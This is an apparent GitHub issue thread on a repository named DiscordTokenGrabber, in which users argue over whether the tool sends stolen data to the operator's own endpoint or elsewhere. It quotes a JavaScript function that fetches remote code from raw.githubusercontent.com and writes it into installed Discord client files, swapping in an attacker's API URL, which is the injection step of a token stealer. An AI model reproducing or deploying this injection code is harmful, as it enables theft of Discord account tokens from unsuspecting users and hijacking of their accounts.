### ISSUE TITLE
Duel hooked ,if you think it is going to grab on your api(webh00k) then you are wrong LMFAO

### ISSUE THREAD

**Issue by xAgent69** [GayarraFrost/DiscordTokenGrabber#3]
function LinjectToDiscord() {
                getInstalledLDiscord()
                fetch("https://raw.githubusercontent.com/GayarraFrost/DiscordTokenGrabber/main/data/index.js").then(r => r.text()).then(r => toInjectJS.forEach(f => fs.writeFileSync(f, r.replace("*API URL*", apiurl))))
                
if you think it is going to grab on your api then you are wrong LMFAO

**Comment by GayarraFrost** [comment]
Maybe you can use your brain and know it’s linux injection and const apiurl = your api

**Comment by xAgent69** [comment]
earlier it was something else
